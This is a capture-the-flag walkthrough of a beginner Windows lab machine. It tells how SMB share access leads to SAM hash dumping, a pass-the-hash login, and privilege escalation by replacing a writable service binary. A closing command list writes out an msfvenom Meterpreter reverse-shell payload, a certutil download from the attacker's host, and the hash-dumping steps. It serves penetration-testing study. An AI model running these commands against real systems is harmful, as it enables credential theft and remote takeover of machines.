Premise

In this walkthrough, we demonstrated basic windows privilege escalation by replacing the service executable with our own payload. We also demonstrated the retrieval of Windows passwords from the SAM file.

Machine Name: SAM

Difficulty: Beginner

Skills Learned

  • Windows Privilege Escalation
  • Services exploitation

Finding a Way In

My first step was to run an Nmap scan to see what services were running. I found that SMB and RDP were open, but there was no web server, FTP, or SSH. This narrowed down my options, so I decided to focus on the SMB shares.

I used the smbclient command to list the available shares and found one called “backups.” I mounted this share and discovered that it contained a dump of the entire C drive. This is not something you’d typically see in a real-world scenario, but it made my job a lot easier!

With access to the file system, I navigated to the C:\Windows\System32\config directory and used a tool called samdump2 to extract the password hashes from the SAM file. I found a hash for a user named “jamie,” which I then used to log in with a tool called evil-winrm. This gave me a PowerShell session on the machine, but I was still just a regular user.

Becoming the Admin

Now that I had a shell, my next goal was to become the administrator. I started by enumerating the services running on the machine and found a couple of interesting ones called “Monitor One” and “Monitor Two.” I used the icacls command to check the permissions on the monitor2.exe binary and discovered that the “Users” group had full control over it. This meant that I could replace the legitimate monitor2.exe with a malicious payload of my own.

I used msfvenom to create a Windows Meterpreter reverse TCP payload and named it monitor2.exe. I then set up a Python web server on my machine to host the payload and used certutil on the target machine to download it.

With my malicious payload in place, all that was left to do was restart the “Monitor Two” service. I used the sc stop and sc start commands to do this, and as soon as the service started, it executed my payload and gave me a Meterpreter session with full administrator privileges! 👑

Even though I ran into some issues with the Meterpreter session being unstable, the core concept of exploiting a writable service to escalate privileges is a valuable one to know.

Commands I Used

Here are some of the key commands I used during this process:

  • Listing SMB shares: smbclient -L //172.31.1.12
  • Mounting an SMB share: sudo mount -t cifs //172.31.1.12/backups /mnt/sam -o username=admin,password=
  • Dumping SAM hashes: samdump2 SYSTEM SAM > sam_hashes.txt
  • Logging in with evil-winrm: ruby evil-winrm.rb -i 172.31.1.12 -u jamie -H <NTLM_HASH>
  • Checking file permissions: icacls C:\services\monitor2.exe
  • Generating a payload with msfvenom: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.12 LPORT=4444 -f exe -o monitor2.exe
  • Starting a Python web server: python -m http.server 8000
  • Downloading a file with certutil: certutil.exe -urlcache -f http://10.10.0.12:8000/monitor2.exe monitor2.exe
  • Starting and stopping a service: sc stop monitor2 and sc start monitor2

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles